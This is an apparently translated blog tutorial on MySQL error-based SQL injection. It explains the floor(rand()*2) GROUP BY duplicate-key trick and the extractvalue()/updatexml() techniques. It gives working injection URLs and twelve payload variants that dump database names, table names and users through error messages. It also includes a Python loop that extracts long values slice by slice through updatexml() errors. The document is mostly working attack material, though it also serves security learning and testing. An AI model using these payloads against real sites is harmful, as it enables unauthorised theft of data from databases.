Error-based injection in SQL injection

Background:

Everything below can be tried in the MySQL command line that ships with phpstudy.

select count(*) from table1;

Counts how many rows your query returns.

select rand();

Returns a random floating-point number between 0 and 1.

select rand()*2;

A random number between 0 and 2.

select floor(1.56);

Rounds down to the nearest integer (1).

select floor(rand()*2);

A random integer that is either 0 or 1.

select floor(rand()*2)a;

Same, with the column given the alias a (compare the column header with the un-aliased version above).

select * from table1 group by id;

Group the rows by id.

select concat(1,2,3);

Concatenates its arguments into one string ('123').

0x3a is ':' and 0x7e is '~'. MySQL treats these hex literals as strings, so they serve as delimiters that make the leaked value easy to spot inside an error message.

select concat(0x3a,0x3a,'haha');

select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;

::dbname::

select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a;

::dbname::[random 0 or 1]

select 'haha' from table1; # note the result: one 'haha' row for every row in table1; compare with select * from table1;

select floor(rand()*2)a from table1;

select floor(rand()*2) from information_schema.columns;

select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;

select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a; # run this several times: sometimes it errors, sometimes it succeeds

(information_schema.columns is used because it exists on every MySQL server and always has plenty of rows.)

select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from table1;

select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from table1 group by a;
This reports a duplicate-key error, for example "Duplicate entry '::dbname::1' for key 'group_key'"; read the error text, it contains the database name. It may also run without error.

count(*) is only there to make this an aggregate query; the thing being grouped on is the concat(...) expression, and that expression contains floor(rand()*2).

The statement above is equivalent to:

select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from table1 group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)); ⇒ GROUP BY groups the rows by the result of the concat expression, which ends in 0 or 1.

According to the MySQL documentation, rand() is re-evaluated every time it is referenced. When the GROUP BY key contains rand(), MySQL evaluates the key once to look it up in the temporary table of groups and, if that group does not exist yet, evaluates it again when inserting the new group. The inserted key can therefore differ from the one that was looked up and collide with a group that already exists, which is the "Duplicate entry" error above.

select rand(0);

After running this we see it is no longer random: a seeded rand() returns the same sequence every time (0.15522..., 0.62088..., 0.63874..., 0.33109..., ...), so floor(rand(0)*2) produces 0,1,1,0,1,1,... and the duplicate-key error fires on the third grouped row every time. Using rand(0) instead of rand() in the payloads below turns a luck-dependent error into a deterministic one, provided the table being selected from has at least three rows.
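The temporary-table behaviour just described can be reproduced without a MySQL server. The Python script below is an added example for this note, not code from the original post: it implements MySQL's RAND(seed) generator (the two-seed LCG modulo 0x3FFFFFFF from my_rnd(), seeded the way RAND(N) seeds it) and a simple model of the GROUP BY "look the key up, re-evaluate it on insert" step. The database name 'security' in the prefix and the row counts are constructed inputs, and the GROUP BY model reflects the behaviour described above rather than the server's actual code.

```python
"""Why floor(rand(0)*2) makes the GROUP BY 'Duplicate entry' error
deterministic once at least three rows are grouped.

Added example for this note, not code from the original post. The RAND()
generator follows MySQL's my_rnd()/seed_random() (two-seed LCG modulo
0x3FFFFFFF). The GROUP BY model (evaluate the key to look it up, evaluate
it AGAIN when inserting a new group) is the behaviour the text describes,
not a reproduction of the server code. The prefix '::security::' and the
row counts are constructed inputs.
"""
import math
import random

MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()


class MySQLRand:
    """MySQL RAND(seed): seed1/seed2 are derived from the integer seed."""

    def __init__(self, seed):
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def next(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


class UnseededRand:
    """Stand-in for MySQL's unseeded RAND(): a fresh random seed per run."""

    def __init__(self):
        self._r = random.Random()

    def next(self):
        return self._r.random()


def floor_rand_times_two(rng, n):
    """The first n values of floor(rand()*2) from the given generator."""
    return [math.floor(rng.next() * 2) for _ in range(n)]


def group_by_rand_key(n_rows, rng, prefix="::security::"):
    """Model of

        select count(*), concat(prefix, floor(rand()*2)) a
        from <table with n_rows rows> group by a;

    For each source row the key is evaluated once to look it up in the
    group temp table; if absent, the row is inserted with the key evaluated
    again (rand() advances), which can collide with an existing group.
    Returns ("ok", {key: count}) or ("error", message).
    """
    groups = {}
    for _ in range(n_rows):
        lookup_key = prefix + str(math.floor(rng.next() * 2))
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        insert_key = prefix + str(math.floor(rng.next() * 2))  # re-evaluated
        if insert_key in groups:
            return ("error",
                    "Duplicate entry '%s' for key 'group_key'" % insert_key)
        groups[insert_key] = 1
    return ("ok", groups)


if __name__ == "__main__":
    print(floor_rand_times_two(MySQLRand(0), 6))  # [0, 1, 1, 0, 1, 1]
    print(group_by_rand_key(2, MySQLRand(0)))     # ok: two rows, no collision
    print(group_by_rand_key(3, MySQLRand(0)))     # error on the third row
    # Unseeded rand(): the error fires only sometimes, the "luck" in the text.
    hits = sum(group_by_rand_key(3, UnseededRand())[0] == "error"
               for _ in range(1000))
    print("unseeded rand(): %d/1000 runs raised the error" % hits)
```

With two rows the first row is inserted under key 1 and the second row looks up key 1 and is counted, so nothing goes wrong; the third row looks up key 0, finds nothing, and is inserted under key 1, which already exists. That is why the payloads have to select from a table with at least three rows (information_schema.tables always qualifies).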



Error-based injection

The scenario: when the input breaks the query, the application displays the database error message; when the input is valid, the query runs but its results are not displayed. The data therefore has to be smuggled out inside the error text.

Dump the database name (with rand() this depends on luck and sometimes produces no error, so retry a few times; rand(0) makes it deterministic):

index.php?id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+

(--+ closes the statement with a comment; the + decodes to the space MySQL requires after --.)

Dump a table name (the part that changes is the (select ...) subquery):

index.php?id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+

Other data (column names, row contents) is dumped the same way: only the (select ...) subquery changes, and limit N,1 steps through the rows.


Some other simple constructions

Simple and efficient:

' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

Both functions raise "XPATH syntax error: '~dbname~'" because the concatenated string is not valid XPath, and the error message echoes the string. Caveat: the message shows at most 32 characters of it (the two ~ included), so longer values such as group_concat() results have to be read in slices with substring().
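The 32-character limit is the part that bites in practice, so here is how the updatexml() payload above is driven in a loop. This Python script is an added example for this note, not code from the original post: build_payload() wraps the leaked subquery in substring() windows that fit the error message, parse_leak() pulls the slice back out of the "XPATH syntax error" text using the ~ delimiters, and extract() reassembles the full value. The HTTP request is replaced by fake_server(), a constructed stand-in that formats the error the way MySQL does for a constructed secret string; the secret, the parameter layout and the 4096-character cap are assumptions, not values from the page.

```python
"""Read a value longer than 32 characters through updatexml()/extractvalue()
error messages, one substring() window at a time.

Added example for this note, not code from the original post. MySQL's
"XPATH syntax error: '...'" message shows at most 32 characters of the
offending string, so a long result (a group_concat() of table names, a
password hash) has to be pulled out in slices. fake_server() is a
constructed stand-in for the vulnerable page; SECRET is a constructed value.
"""
import re

DELIM = "~"                              # 0x7e, the delimiter used in the payloads
ERROR_LIMIT = 32                         # characters MySQL shows inside the quotes
WINDOW = ERROR_LIMIT - 2 * len(DELIM)    # payload budget once both ~ are counted

# Constructed secret standing in for e.g. group_concat(table_name); it is
# longer than 32 characters so a single updatexml() call cannot show it all.
SECRET = "emails,referers,uagents,users,flag_table_2022"

ERROR_RE = re.compile(r"XPATH syntax error: '~(.*?)~'")


def build_payload(inner_select, offset, length=WINDOW):
    """updatexml() payload leaking substring((inner_select), offset, length).

    offset is 1-based, as in MySQL's substring(). The ~ delimiters let
    parse_leak() find the slice even when the page prints other text too.
    """
    return ("' and updatexml(1,concat(0x7e,substring((%s),%d,%d),0x7e),1) --+"
            % (inner_select, offset, length))


def fake_server(payload):
    """Constructed stand-in for the vulnerable page.

    Returns the error text updatexml() would raise for SECRET, truncated the
    way MySQL truncates it. It only reads the offset/length we put in the
    payload; a real target would be reached with an HTTP request instead.
    """
    m = re.search(r"substring\(\(.*?\),(\d+),(\d+)\)", payload)
    offset, length = int(m.group(1)), int(m.group(2))
    leaked = DELIM + SECRET[offset - 1:offset - 1 + length] + DELIM
    return "XPATH syntax error: '%s'" % leaked[:ERROR_LIMIT]


def parse_leak(response):
    """The leaked slice from the error text, or None if no error is shown."""
    m = ERROR_RE.search(response)
    return m.group(1) if m else None


def extract(inner_select, send=fake_server, max_len=4096):
    """Slide substring() windows across the value until a window comes back
    shorter than requested (end of string) or no error is shown."""
    result, offset = "", 1
    while offset <= max_len:
        chunk = parse_leak(send(build_payload(inner_select, offset)))
        if chunk is None:
            break
        result += chunk
        if len(chunk) < WINDOW:
            break
        offset += WINDOW
    return result


if __name__ == "__main__":
    query = ("select group_concat(table_name) from information_schema.tables "
             "where table_schema='security'")
    print(build_payload(query, 1))
    print(extract(query))
```

The same loop works for extractvalue(): only the function call in build_payload() changes, the 32-character truncation and the ~ parsing are identical.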

Twelve error-based injection techniques (several of these, in particular the exp() and geometry-function variants, only raise an error on older MySQL 5.x servers and are silent on current releases, so check the target version first):

1. Via floor(), payload as follows:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

2. Via ExtractValue(), payload as follows:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

3. Via UpdateXml(), payload as follows:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

4. Via NAME_CONST() (duplicate column name), payload as follows:
and exists(select * from (select * from (select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

5. Via join (duplicate column name), shown as a standalone query:
select * from (select * from mysql.user a join mysql.user b)c;

6. Via exp() (DOUBLE value out of range), payload as follows:
and exp(~(select * from (select user())a))

7. Via GeometryCollection(), payload as follows:
and GeometryCollection((select * from (select user())a)b)

8. Via polygon(), payload as follows:
and polygon((select * from (select user())a)b)

9. Via multipoint(), payload as follows:
and multipoint((select * from (select user())a)b)

10. Via multilinestring(), payload as follows:
and multilinestring((select * from (select user())a)b)

11. Via multipolygon(), payload as follows:
and multipolygon((select * from (select user())a)b)

12. Via linestring(), payload as follows:
and linestring((select * from (select user())a)b)

Posted 2022-05-03 21:57 by 山归时有雾